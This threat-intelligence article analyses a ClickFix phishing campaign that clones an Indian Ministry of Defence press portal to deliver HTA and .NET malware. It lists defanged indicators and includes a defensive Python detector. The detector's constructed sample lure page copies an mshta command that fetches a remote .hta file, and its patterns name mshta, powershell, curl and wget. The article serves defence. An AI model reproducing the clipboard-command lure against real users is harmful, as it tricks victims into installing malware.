A sophisticated phishing campaign has been uncovered wherein threat actors impersonate India’s Ministry of Defence to propagate malware across both Windows and Linux environments.
Leveraging a ClickFix-style delivery mechanism, the actors exploit recognizable government branding and web structures to lure unsuspecting users into executing malicious payloads.
The infrastructure, meticulously spoofed to mimic official Ministry press release archives, stages malware via compromised or abandoned .in domains, with a focus on deceiving users through visual and procedural authenticity.
Cross-Platform Social Engineering Campaign Imitates Indian Government Infrastructure
Initial reconnaissance by Hunt.io revealed that the malicious domain email.gov.in.drdosurvey[.]info was serving a duplicate of the Ministry of Defence’s press release portal.
This clone, closely mirroring the legitimate site’s layout, limited user interaction to a single, seemingly legitimate March 2025 press release link; all other months displayed inert “No Data” placeholders.

Technical analysis of the page’s source code indicated its construction using HTTrack, a widely available website duplication tool, with embedded metadata pointing to early March 2025 as the timeframe of the compromise.
Upon engaging with the active link, victims are funneled into a ClickFix social engineering path tailored by operating system.
For Windows users, the portal redirects to a /captcha/windows.php page presenting a full-screen “For Official Use Only” (FOUO) overlay with a blurred background image of the legitimate yoga.ayush.gov[.]in website.
A JavaScript function automatically copies a malicious mshta.exe command to the clipboard, instructing users to paste and execute it in their terminal.
This command retrieves an obfuscated .hta script (sysinte.hta) from the attacker-controlled trade4wealth[.]in infrastructure, which subsequently loads a .NET-based malware loader initiating outbound connections to 185.117.90[.]212 (linked to the email.gov.in.avtzyu[.]store subdomain).
During this sequence, the victim is shown a decoy PDF cloned from an authentic Ministry press release to sustain the illusion of legitimacy.

APT36 Suspected in Latest ClickFix Delivery Chain; Security Teams Urged to Monitor for Evolving Techniques
For Linux targets, the infection chain is less mature yet follows a similar template.
Victims are presented with a deliberately misspelled CAPTCHA prompt (“I’m not a rebot”) which, when clicked, silently copies a shell command to the clipboard.
Executing this command downloads a shell script (mapeal.sh) from the same staging infrastructure and opens a benign JPEG image; as of analysis, it does not exhibit further malicious behavior or persistence mechanisms.
Detailed scrutiny of the campaign’s infrastructure reveals several tell-tale operator traits: use of typosquatted domains resembling Indian government properties, reliance on Namecheap for domain registration, deployment of HTA payloads in deep directory structures, and common spelling anomalies to evade pattern detection.
These tactics align with historic activity attributed to APT36 (Transparent Tribe), a Pakistan-aligned threat group renowned for targeting Indian governmental and military interests through similar delivery methods, including cloned portals, HTA scripting, and .NET-based malware.
This campaign underscores a trend of subtle refinement in threat actor tradecraft, combining credible visual lures, cross-platform execution via the clipboard, and adaptive payload delivery to increase the success rate against targeted entities.
Security teams are advised to scrutinize for clipboard-based attack vectors, shallow site clones of trusted domains, and government-themed lure content staged under web asset directories, as these form the composite signature of this evolving threat landscape.
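As an added illustration of the checks recommended above, the script below is example code written for this article, not tooling from Hunt.io or from the campaign itself. It scans an HTML document for the three traits the analysis describes: an HTTrack mirror banner (the comment HTTrack writes into cloned pages), a script that writes a ready-to-run interpreter command to the clipboard, and the misspelled CAPTCHA prompt. Both sample pages are constructed, and their hostnames are placeholders.

```python
import re

# Constructed sample of a ClickFix-style lure page (not captured from the
# campaign; hostnames are placeholders).
SAMPLE_LURE = """<!-- Mirrored from press.example.invalid/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 03 Mar 2025 09:12:45 GMT -->
<html><body>
<div id="captcha">I'm not a rebot</div>
<script>
function verify() {
  var cmd = "mshta https://cdn.example.invalid/assets/img/x/y/z/update.hta";
  navigator.clipboard.writeText(cmd);
}
</script></body></html>"""

# Constructed benign page: a share button also writes to the clipboard, so a
# clipboard write on its own must not be treated as an indicator.
BENIGN_PAGE = """<html><body><h1>Press Releases</h1>
<script>document.execCommand('copy');</script>
<p>Share this link: https://example.invalid/pr/2025/03</p></body></html>"""

HTTRACK_BANNER = re.compile(r"<!--\s*Mirrored from\s+(\S+)\s+by\s+HTTrack", re.I)
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText|document\.execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# A quoted JS string literal that begins with an interpreter or downloader.
INTERPRETER_STRING = re.compile(
    r"""["']((?:mshta|powershell|cmd(?:\.exe)?|curl|wget|bash|sh)\b[^"']*)["']""", re.I)
MISSPELLED_CAPTCHA = re.compile(r"not a rebot", re.I)


def assess_page(html: str) -> dict:
    """Return the clone/ClickFix indicators found in one HTML document."""
    findings = {}
    banner = HTTRACK_BANNER.search(html)
    if banner:
        findings["httrack_mirror_of"] = banner.group(1)
    command = INTERPRETER_STRING.search(html)
    # Flag the clipboard write only when the page also carries a command
    # string for the victim to paste; share buttons alone are not suspicious.
    if CLIPBOARD_WRITE.search(html) and command:
        findings["clipboard_command"] = command.group(1)
    if MISSPELLED_CAPTCHA.search(html):
        findings["misspelled_captcha"] = True
    # A pasteable command is decisive; otherwise require two weaker traits.
    findings["suspicious"] = "clipboard_command" in findings or len(findings) >= 2
    return findings


if __name__ == "__main__":
    for name, page in (("lure", SAMPLE_LURE), ("benign", BENIGN_PAGE)):
        print(name, assess_page(page))
```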
Indicators of Compromise (IOCs)
| IP Address | Domain(s) | Hosting Company | Location |
|---|---|---|---|
| 192.64.118[.]76 | email[.]gov[.]in[.]drdosurvey[.]info | Namecheap, Inc. | US |
| 185.117.90[.]212 | email[.]gov[.]in[.]avtzyu[.]store | HZ Hosting Ltd | NL |

| Filename | SHA-256 | Misc. |
|---|---|---|
| sysinte.hta | 7087e5f768acaad83550e6b1b9696477089d2797e8f6e3f9a9d69c77177d030e | HTA file associated with Windows ClickFix |